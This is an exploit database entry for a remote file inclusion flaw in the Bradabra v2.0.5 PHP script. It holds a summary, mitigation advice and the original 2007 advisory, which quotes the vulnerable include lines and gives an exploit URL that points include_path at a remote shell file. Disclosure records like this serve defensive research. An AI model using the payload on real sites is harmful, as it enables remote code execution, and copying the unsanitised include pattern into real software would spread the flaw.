header-logo
Suggest Exploit
vendor:
Bradabra
by:
GolD_M = Mahmood_ali
7.5
CVSS
HIGH
Remote File Inclusion
Not specified
CWE
Product Name: Bradabra
Affected Version From: v2.0.5
Affected Version To: Not specified
Patch Exists: No
Related CWE: Not specified
CPE: Not specified
Metasploit:
Other Scripts:
Platforms Tested: Not specified
Not specified

Bradabra v2.0.5 Remote File Include Vulnerability

The vulnerability allows an attacker to include a remote file in the 'includes.php' file of the Bradabra v2.0.5 script. By manipulating the 'include_path' parameter, an attacker can include a malicious file from a remote server, potentially leading to remote code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the Bradabra script that addresses the remote file inclusion issue. Additionally, it is important to validate and sanitize user-supplied input to prevent malicious file inclusion.
Source

Exploit-DB raw data:

======================================================================
Bradabra <== v2.0.5 Remote File Include Vulnerability               #
======================================================================
Downlaoad Script :ftp://ftp1.comscripts.com/PHP/773_bradabra-205.gz #
======================================================================
Author: GolD_M = Mahmood_ali  &&  Contact: HackEr_@W.Cn             #
======================================================================
SpeciaL GreeTz : Tryag-Team & 4lKaSrGoLd3n-Team                     #
======================================================================
In:  /include/includes.php                                          #
======================================================================
Vulnerable Code:                                                    #
======================================================================
include $include_path."config_user.php";                            #
include $include_path."defines.php";                                #
include $include_path."lang.php";                                   #
include $include_path."functions.php";                              #
include $include_path."functions_arch.php";                         #
include $include_path."style.php";                                  #
include $include_path."sql.php";                                    #
include $include_path."db_connect.php";                             #
include $include_path."db.php";                                     #
include $include_path."login_check.php";                            #
include $include_path."functions_js.php";                           #
======================================================================
Exploit:                                                            #
======================================================================
http://Victim.Com/include/includes.php?include_path=Shell.txt       #
======================================================================
                    Tryag.Com & Dwrat.com                          #
======================================================================

# milw0rm.com [2007-01-20]